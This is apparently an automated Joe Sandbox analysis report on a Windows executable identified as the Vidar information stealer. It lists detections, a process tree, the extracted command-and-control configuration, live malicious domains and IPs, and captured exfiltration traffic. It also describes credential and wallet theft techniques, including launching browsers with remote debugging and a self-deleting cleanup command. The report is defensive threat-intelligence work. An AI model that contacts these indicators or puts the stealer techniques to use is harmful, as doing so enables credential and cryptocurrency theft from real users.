Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BHgwhz3lGN.exe

Overview

General Information

Sample name:BHgwhz3lGN.exe
renamed because original name is a hash value
Original sample name:ed0fdaf80191fad95aa5c2a7882064e2.exe
Analysis ID:1582430
MD5:ed0fdaf80191fad95aa5c2a7882064e2
SHA1:debe6e60480b524022308a7a0c66e0424f91dade
SHA256:72a37e2a65b502af4a3fabf99f069bdb51a50cebb764fb6eb4a1920320dd849c
Tags:exeuser-abuse_ch
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Monitors registry run keys for changes
PE file has a writeable .text section
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • BHgwhz3lGN.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\BHgwhz3lGN.exe" MD5: ED0FDAF80191FAD95AA5C2A7882064E2)
    • chrome.exe (PID: 7684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2100,i,2626342174321460321,8661316679796847661,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • msedge.exe (PID: 7480 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 988 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2428 --field-trial-handle=2272,i,10543292618471118096,2604658211909897831,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • cmd.exe (PID: 8852 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\6xb1d" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 9028 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • msedge.exe (PID: 2320 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 4108 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=1988,i,17298564299036040629,6959410782375951198,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8196 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7152 --field-trial-handle=1988,i,17298564299036040629,6959410782375951198,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8216 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7304 --field-trial-handle=1988,i,17298564299036040629,6959410782375951198,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8748 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7396 --field-trial-handle=1988,i,17298564299036040629,6959410782375951198,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199811540174", "Botnet": "hu76fa"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1522441957.00000000004E1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000003.1483165863.00000000004E0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000000.00000003.1470034888.00000000004E4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000000.00000003.1497511197.00000000004E3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 2 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Browser Started with Remote Debugging
              Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\BHgwhz3lGN.exe", ParentImage: C:\Users\user\Desktop\BHgwhz3lGN.exe, ParentProcessId: 7428, ParentProcessName: BHgwhz3lGN.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7684, ProcessName: chrome.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T15:55:11.901281+010020442471Malware Command and Control Activity Detected116.203.14.4443192.168.2.949710TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T15:55:13.337328+010020518311Malware Command and Control Activity Detected116.203.14.4443192.168.2.949711TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T15:55:10.588944+010020490871A Network Trojan was detected192.168.2.949709116.203.14.4443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T15:55:09.236181+010028593781Malware Command and Control Activity Detected192.168.2.949708116.203.14.4443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://sdoout.lolAvira URL Cloud: Label: malware
              Source: https://sdoout.lol/pcAvira URL Cloud: Label: malware
              Source: https://sdoout.lol/FYAvira URL Cloud: Label: malware
              Source: https://sdoout.lol/zAvira URL Cloud: Label: malware
              Source: https://sdoout.lol/Avira URL Cloud: Label: malware
              Source: https://sdoout.lol/XAvira URL Cloud: Label: malware
              Found malware configuration
              Source: BHgwhz3lGN.exeMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199811540174", "Botnet": "hu76fa"}
              Multi AV Scanner detection for submitted file
              Source: BHgwhz3lGN.exeReversingLabs: Detection: 34%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: BHgwhz3lGN.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0040C009 CryptUnprotectData,0_2_0040C009
              Source: BHgwhz3lGN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.9:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 116.203.14.4:443 -> 192.168.2.9:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 116.203.14.4:443 -> 192.168.2.9:53891 version: TLS 1.2
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041008C FindFirstFileA,0_2_0041008C
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004291EA FindFirstFileA,0_2_004291EA
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00428248 FindFirstFileA,memset,memset,0_2_00428248
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042A4E5 FindFirstFileA,0_2_0042A4E5
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0040E749 FindFirstFileA,0_2_0040E749
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0040177C FindFirstFileA,0_2_0040177C
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00412AC9 FindFirstFileA,0_2_00412AC9
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0040CCEA FindFirstFileA,0_2_0040CCEA
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042BD1E FindFirstFileA,0_2_0042BD1E
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004018DA FindFirstFileA,0_2_004018DA
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00428DDA GetLogicalDriveStringsA,0_2_00428DDA
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.9:49709 -> 116.203.14.4:443
              Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.9:49708 -> 116.203.14.4:443
              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.14.4:443 -> 192.168.2.9:49710
              Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.14.4:443 -> 192.168.2.9:49711
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199811540174
              Source: global trafficTCP traffic: 192.168.2.9:53846 -> 1.1.1.1:53
              Source: global trafficHTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 20.189.173.8 20.189.173.8
              Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
              Source: Joe Sandbox ViewIP Address: 20.110.205.119 20.110.205.119
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.26
              Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.26
              Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.26
              Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.26
              Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.26
              Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.26
              Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.26
              Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.26
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.8
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.8
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.8
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.8
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.8
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.8
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.8
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.8
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.8
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.8
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.8
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.33
              Source: unknownTCP traffic detected without corresponding DNS query: 23.44.203.178
              Source: unknownTCP traffic detected without corresponding DNS query: 23.44.203.178
              Source: unknownTCP traffic detected without corresponding DNS query: 23.44.203.178
              Source: unknownTCP traffic detected without corresponding DNS query: 23.44.203.178
              Source: unknownTCP traffic detected without corresponding DNS query: 23.44.203.178
              Source: unknownTCP traffic detected without corresponding DNS query: 23.44.203.178
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0040A09E recv,0_2_0040A09E
              Source: global trafficHTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: sdoout.lolConnection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCNy9zQEIucrNAQip0c0BCInTzQEIqdXNAQjJ1s0BCPTWzQEIqNjNAQj5wNQVGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCNy9zQEIucrNAQip0c0BCInTzQEIqdXNAQjJ1s0BCPTWzQEIqNjNAQj5wNQVGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /b?rn=1735570536847&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0D1D943A7B9D67B72691815F7AEF6664&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735570536847&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=68ae4f54c4b54ec091b4e816c09ceaa4&activityId=68ae4f54c4b54ec091b4e816c09ceaa4&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0D1D943A7B9D67B72691815F7AEF6664; _EDGE_S=F=1&SID=38B0BBDA67E56A6606D2AEBF66AE6B66; _EDGE_V=1
              Source: global trafficHTTP traffic detected: GET /b2?rn=1735570536847&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0D1D943A7B9D67B72691815F7AEF6664&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=199467e39237cba6052fa631735570538; XID=199467e39237cba6052fa631735570538
              Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735570536847&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=68ae4f54c4b54ec091b4e816c09ceaa4&activityId=68ae4f54c4b54ec091b4e816c09ceaa4&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=50901D4D6116491A952B6DE789F1FD6E&MUID=0D1D943A7B9D67B72691815F7AEF6664 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0D1D943A7B9D67B72691815F7AEF6664; _EDGE_S=F=1&SID=38B0BBDA67E56A6606D2AEBF66AE6B66; _EDGE_V=1; SM=T
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: t.me
              Source: global trafficDNS traffic detected: DNS query: sdoout.lol
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: apis.google.com
              Source: global trafficDNS traffic detected: DNS query: play.google.com
              Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
              Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
              Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
              Source: global trafficDNS traffic detected: DNS query: c.msn.com
              Source: global trafficDNS traffic detected: DNS query: assets.msn.com
              Source: global trafficDNS traffic detected: DNS query: api.msn.com
              Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
              Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
              Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----xt2dbs0r1n7yua1db1nyUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: sdoout.lolContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
              Source: chromecache_519.5.drString found in binary or memory: http://www.broofa.com
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563122466.0000000003362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_516.5.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
              Source: chromecache_516.5.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
              Source: chromecache_519.5.dr, chromecache_516.5.drString found in binary or memory: https://apis.google.com
              Source: 2cc80dabc69f58b6_1.10.drString found in binary or memory: https://assets.msn.cn/resolver/
